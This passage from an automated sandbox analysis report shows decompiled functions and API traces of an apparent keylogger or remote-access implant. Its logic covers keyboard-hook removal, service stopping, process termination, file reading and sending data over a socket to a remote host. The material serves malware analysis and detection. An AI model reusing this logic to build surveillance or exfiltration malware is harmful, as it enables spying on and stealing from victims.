					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                            0x013c1862
                                            0x013c1868
                                            0x013c1873
                                            0x013c1875
                                            0x013c1883
                                            0x013c1887
                                            0x013c18a8
                                            0x013c18ab
                                            0x013c18ae
                                            0x013c1889
                                            0x013c188a
                                            0x013c188a
                                            0x013c18b3
                                            0x013c18bf

                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,Function_0001B310,?,?,?,?,?,?,?,013C11F9), ref: 013C1868
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,013C11F9), ref: 013C1875
                                            • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,013C11F9), ref: 013C187D
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,013C11F9), ref: 013C188A
                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,013C11F9), ref: 013C1899
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,013C11F9), ref: 013C18AB
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,013C11F9), ref: 013C18AE
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,013C11F9), ref: 013C18B3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                            • String ID:
                                            • API String ID: 858787766-0
                                            • Opcode ID: a665a1d48d1ff14f1a5ef9eb1c616d517575d734e839d6afd63e7d7782fb30c1
                                            • Instruction ID: ac9d836d84b3db0c8af52aa3a6960e5bbc21c2f5fc4a3a5e784ba5f7a4f4b7bf
                                            • Opcode Fuzzy Hash: a665a1d48d1ff14f1a5ef9eb1c616d517575d734e839d6afd63e7d7782fb30c1
                                            • Instruction Fuzzy Hash: D8F04F71600228AFD3206A74AC89EBF3BACEF45794F440015FA06D2045DB74BD459BE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C290A, Relevance: 12.0, APIs: 8, Instructions: 40COMMON
                                            Download Yara Rule
                                            APIs
                                            • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6F54CB60,?,?,013C225E,?), ref: 013C2919
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,013C225E,?), ref: 013C2937
                                            • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,013C225E,?), ref: 013C293F
                                            • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,013C225E,?), ref: 013C294A
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,013C225E,?), ref: 013C2954
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,013C225E,?), ref: 013C295D
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,013C225E,?), ref: 013C296C
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,013C225E,?), ref: 013C2975
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                            • String ID:
                                            • API String ID: 1083762089-0
                                            • Opcode ID: 23925eda8ed79f89ef09bdddbbb8c0ecfb090957a7ac6c62f408f45980646b25
                                            • Instruction ID: ea5decb0b75f031a2437399f87707f334139c16d977b1cc84ef1f847acacf9a1
                                            • Opcode Fuzzy Hash: 23925eda8ed79f89ef09bdddbbb8c0ecfb090957a7ac6c62f408f45980646b25
                                            • Instruction Fuzzy Hash: 0801A23560011AEFCF14AF64E8589EE3BBDFB08355F448114F916972A4EB34BA15CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2881, Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 43%
                                            			E013C2881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
				char _v20;
				void* _t15;
				void* _t18;
				signed int _t20;
				void* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t36;
				void* _t46;
				signed int _t57;
				void* _t58;

				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t57 = __eax + 2;
				_t15 = _t57 + _t57;
				L013C3E84();
				_t25 = _t15;
				_t28 = _t57;
				_t46 = _t25;
				_t29 = _t28 >> 2;
				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
				_t6 = _t57 - 2; // 0x0
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
				_t58 = _t18;
				_t36 = _t6 >> 2;
				_t20 = memcpy(_t25, _t58, _t36 << 2);
				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
				L013C3EBE();
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}














                                            0x013c288d
                                            0x013c2896
                                            0x013c2897
                                            0x013c289b
                                            0x013c28a1
                                            0x013c28a3
                                            0x013c28a9
                                            0x013c28ab
                                            0x013c28b5
                                            0x013c28ba
                                            0x013c28bd
                                            0x013c28c3
                                            0x013c28cb
                                            0x013c28ce
                                            0x013c28d9
                                            0x013c28df
                                            0x013c28e6
                                            0x013c28f3
                                            0x013c28fc
                                            0x013c2909

                                            APIs
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBA38,013CBCB0,00000000,013B903C,013C40D8,00000000,0000000B), ref: 013C288D
                                            • ??2@YAPAXI@Z.MSVCRT ref: 013C289B
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28BD
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013C28DF
                                            • ??3@YAXPAX@Z.MSVCRT ref: 013C28E6
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28F3
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28FC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                            • String ID:
                                            • API String ID: 391609400-0
                                            • Opcode ID: 712a72afaafdca0cab0e29ef576f841f73cf793cd30dbe1a8062ca7a44d76720
                                            • Instruction ID: 7fa6d250da81294a2023f3ebf966e5a523e2822067d324e8f3bf4525aadd3bee
                                            • Opcode Fuzzy Hash: 712a72afaafdca0cab0e29ef576f841f73cf793cd30dbe1a8062ca7a44d76720
                                            • Instruction Fuzzy Hash: 7B012D327001199FCB19EA68E8959AF77EEFB88255B44452DF907C7284DE70A905CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B5D50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,013B55A2), ref: 013B5D76
                                              • Part of subcall function 013B5DD3: GetLocalTime.KERNEL32(?,747843E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,013B51C6), ref: 013B5DE1
                                              • Part of subcall function 013B5DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,013B51C6), ref: 013B5DF9
                                              • Part of subcall function 013B5DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 013B5E06
                                              • Part of subcall function 013B5DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 013B5E12
                                              • Part of subcall function 013B5DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E1B
                                              • Part of subcall function 013B5DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E24
                                              • Part of subcall function 013B5DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E2D
                                              • Part of subcall function 013B5DD3: malloc.MSVCRT ref: 013B5E37
                                              • Part of subcall function 013B5DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,013B51C6,?,?,?,?,]), ref: 013B5E61
                                              • Part of subcall function 013B5DD3: sprintf.MSVCRT ref: 013B5E69
                                              • Part of subcall function 013B5DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 013B5E7C
                                              • Part of subcall function 013B5DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 013B5E8C
                                              • Part of subcall function 013B5DD3: SetEvent.KERNEL32(00000000), ref: 013B5E95
                                              • Part of subcall function 013B5DD3: free.MSVCRT(00000000), ref: 013B5E9C
                                              • Part of subcall function 013B5DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B5EA6
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,013B55A2), ref: 013B5D8D
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 013B5DA1
                                            • UnhookWindowsHookEx.USER32(00000000), ref: 013B5DC0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                            • String ID: Offline Keylogger Stopped$[INFO]
                                            • API String ID: 2222684746-1731565019
                                            • Opcode ID: d28f1c81c38e78a8b62261a0c82aeaf3e6ebfb6c4dbf8953d5fe9c2383c24253
                                            • Instruction ID: d45e7d0ae0317bf8cf55cbf143ff53f874c2d424e98b39c9109d0ba7a4864514
                                            • Opcode Fuzzy Hash: d28f1c81c38e78a8b62261a0c82aeaf3e6ebfb6c4dbf8953d5fe9c2383c24253
                                            • Instruction Fuzzy Hash: 8201F564A003446FE721672DC88E7FF7FACDB41618F44014DD94282685E7A5794A8BA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2DDF, Relevance: 9.0, APIs: 6, Instructions: 48fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E013C2DDF(void _a4, void* _a8) {
				struct _OVERLAPPED* _t13;
				void* _t16;
				long _t17;
				void* _t19;

				_t13 = 0;
				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t19 != 0xffffffff) {
					_t17 = GetFileSize(_t19, 0);
					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
					_t8 =  &_a4;
					_a4 = 0;
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
						_t13 = 1;
					}
					CloseHandle(_t19);
					return _t13;
				}
				return 0;
			}







                                            0x013c2de3
                                            0x013c2dff
                                            0x013c2e04
                                            0x013c2e16
                                            0x013c2e1a
                                            0x013c2e23
                                            0x013c2e29
                                            0x013c2e2c
                                            0x013c2e3d
                                            0x013c2e3f
                                            0x013c2e3f
                                            0x013c2e42
                                            0x00000000
                                            0x013c2e48
                                            0x00000000

                                            APIs
                                            • CreateFileW.KERNEL32(747DF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,747DF560,?,013B9C9F,00000000), ref: 013C2DF9
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,013B9C9F,00000000), ref: 013C2E0D
                                            • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,013B9C9F,00000000), ref: 013C2E1A
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,013B9C9F,00000000), ref: 013C2E2C
                                            • ReadFile.KERNEL32(00000000,00000000,?,?,013B9C9F,00000000), ref: 013C2E34
                                            • CloseHandle.KERNEL32(00000000,?,013B9C9F,00000000), ref: 013C2E42
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                            • String ID:
                                            • API String ID: 2061410294-0
                                            • Opcode ID: 16a30db144d49c9ac056f8f8f82841a7d815bebd7498d2eeffd74841f66f3ac9
                                            • Instruction ID: 9799aef193f787bf399218da1f1f357ce72853a3899dc49e1c009bc440bc1da1
                                            • Opcode Fuzzy Hash: 16a30db144d49c9ac056f8f8f82841a7d815bebd7498d2eeffd74841f66f3ac9
                                            • Instruction Fuzzy Hash: 3FF03171241118BFEB215E65EC8CFBB7B6CEB467A9F10411AFE15A6280C6716E019B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B9D02, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013B9D02(void** _a4) {
				void* _t4;
				long _t5;
				struct HRSRC__* _t7;

				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t4 = LockResource(LoadResource(0, _t7));
				_t5 = SizeofResource(0, _t7);
				 *_a4 = _t4;
				return _t5;
			}






                                            0x013b9d16
                                            0x013b9d22
                                            0x013b9d2d
                                            0x013b9d37
                                            0x013b9d3b

                                            APIs
                                            • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 013B9D10
                                            • LoadResource.KERNEL32(00000000,00000000,?,?,?,013B983C,00000000,?,?,00000000), ref: 013B9D1B
                                            • LockResource.KERNEL32(00000000,?,?,?,013B983C,00000000,?,?,00000000), ref: 013B9D22
                                            • SizeofResource.KERNEL32(00000000,00000000,?,?,?,013B983C,00000000,?,?,00000000), ref: 013B9D2D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID: SETTINGS
                                            • API String ID: 3473537107-594951305
                                            • Opcode ID: a9754aaaf8de87736b73c0e1f0cc511fd0dda69230be35981eabceeede79f03f
                                            • Instruction ID: 1f510759eeb0b42bcb5235fd297961a3b0737c2902092185fd0efd21d935679f
                                            • Opcode Fuzzy Hash: a9754aaaf8de87736b73c0e1f0cc511fd0dda69230be35981eabceeede79f03f
                                            • Instruction Fuzzy Hash: F0E0BF31740324BBD6201AA6AC0DF5A7E6CEB96B63F000059FA09CB2C4C9717400C7E2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B5C62, Relevance: 7.5, APIs: 5, Instructions: 42synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E013B5C62(void* __ecx) {
				long _t7;
				void* _t10;
				void* _t18;
				void* _t19;

				_t18 = __ecx;
				_t7 = CreateEventA(0, 0, 0, 0);
				 *(_t18 + 0x34) = _t7;
				if( *((char*)(_t18 + 0x3d)) != 0) {
					_t10 = _t18 + 0x14;
					do {
						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x13c5664);
						if(_t7 != 0) {
							_t19 = _t19 - 0x10;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							E013B20C2(0x13cbe70, 0x5a, _t10);
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x13c5664);
						}
						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
					} while ( *((char*)(_t18 + 0x3d)) != 0);
				}
				return 1;
			}







                                            0x013b5c6a
                                            0x013b5c6d
                                            0x013b5c77
                                            0x013b5c7a
                                            0x013b5c7c
                                            0x013b5c84
                                            0x013b5c86
                                            0x013b5c90
                                            0x013b5c92
                                            0x013b5c98
                                            0x013b5ca5
                                            0x013b5cad
                                            0x013b5cad
                                            0x013b5cb8
                                            0x013b5cbe
                                            0x013b5c84
                                            0x013b5cc9

                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,013B52B3), ref: 013B5C6D
                                            • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,013C5664), ref: 013B5C86
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B5C98
                                              • Part of subcall function 013B20C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B20C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(013C5664,0000005A), ref: 013B5CAD
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 013B5CB8
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                            • String ID:
                                            • API String ID: 2456067102-0
                                            • Opcode ID: 34d925de1470e7053dc4b9ab82137f5dbd2372e699f88e221c362b9f86b7b56e
                                            • Instruction ID: b8ee79be8d81e964f718ebfa1a923fed9284591f5fc579102642c43ed5a349e1
                                            • Opcode Fuzzy Hash: 34d925de1470e7053dc4b9ab82137f5dbd2372e699f88e221c362b9f86b7b56e
                                            • Instruction Fuzzy Hash: 28F0C8752003006FEB2027289DCDA677BAEEB81726F44160DF142869C1DA6178048B30
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2981, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 013C2996
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013C29A8
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 013C29B4
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C29D5
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C29DE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                            • String ID:
                                            • API String ID: 1435062097-0
                                            • Opcode ID: 13c3c24ec58909f6e01951212b7329da064984f018c38e6d61bc7960e4b0f0ab
                                            • Instruction ID: 6606fc40eb2515d9f6799bd3120f122179ae20c96f67f762a6bcf7b9d09df2bb
                                            • Opcode Fuzzy Hash: 13c3c24ec58909f6e01951212b7329da064984f018c38e6d61bc7960e4b0f0ab
                                            • Instruction Fuzzy Hash: CC01DF7590021AEFCB109F68D888AEE7BBCFF89314F008009FC1297285DB30BA45CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B2526, Relevance: 7.5, APIs: 5, Instructions: 34networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • socket.WS2_32(00000000,00000001,00000006), ref: 013B2530
                                            • connect.WS2_32(00000000,013CB320,00000010), ref: 013B253F
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,Function_0001B310,?,013B40BC,00000056,?,?,?,?,?,?,?,?,?,?,Function_0001B310), ref: 013B2552
                                              • Part of subcall function 013B2440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBE70,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B244A
                                              • Part of subcall function 013B2440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2463
                                              • Part of subcall function 013B2440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B246E
                                              • Part of subcall function 013B2440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B247B
                                              • Part of subcall function 013B2440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B248D
                                              • Part of subcall function 013B2440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2498
                                              • Part of subcall function 013B2440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24A7
                                              • Part of subcall function 013B2440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24B1
                                              • Part of subcall function 013B2440: send.WS2_32(?,00000000), ref: 013B24BB
                                              • Part of subcall function 013B2440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2512
                                              • Part of subcall function 013B2440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B251B
                                            • closesocket.WS2_32(00000000), ref: 013B256A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,013CB320,00000010,00000000,00000001,00000006,Function_0001B310,?,013B40BC,00000056), ref: 013B2575
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                            • String ID:
                                            • API String ID: 3330461409-0
                                            • Opcode ID: 7f051762742f38705829c2a77dc52e1b602a9dc9d0233b5251ee3a5d330ea06c
                                            • Instruction ID: 9f0f41b10c4343947a8d2ec972009fd04421f64869a3cc7f3c92ca1d3cb1b58e
                                            • Opcode Fuzzy Hash: 7f051762742f38705829c2a77dc52e1b602a9dc9d0233b5251ee3a5d330ea06c
                                            • Instruction Fuzzy Hash: 13F02731B4021837DB203A6C9C15FDF7E0C8F61BA8F004214FE15950C1EBB5AA1083D1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BD817, Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E013BD817(void* __eflags) {
				char* _t8;
				void* _t25;

				_t8 = E013B180C(_t25 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
				E013C26BC( *(_t25 - 0x2c));
				E013BEBBE();
				E013B17DD(_t25 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                            0x013bd820
                                            0x013bd827
                                            0x013bd836
                                            0x013bd83f
                                            0x013be51b
                                            0x013be6a4
                                            0x013be6ac
                                            0x013be6b5
                                            0x013be6c1

                                            APIs
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 013BD827
                                            • atoi.MSVCRT ref: 013BD82E
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 013BD836
                                              • Part of subcall function 013C26BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 013C26C9
                                              • Part of subcall function 013C26BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 013C26D7
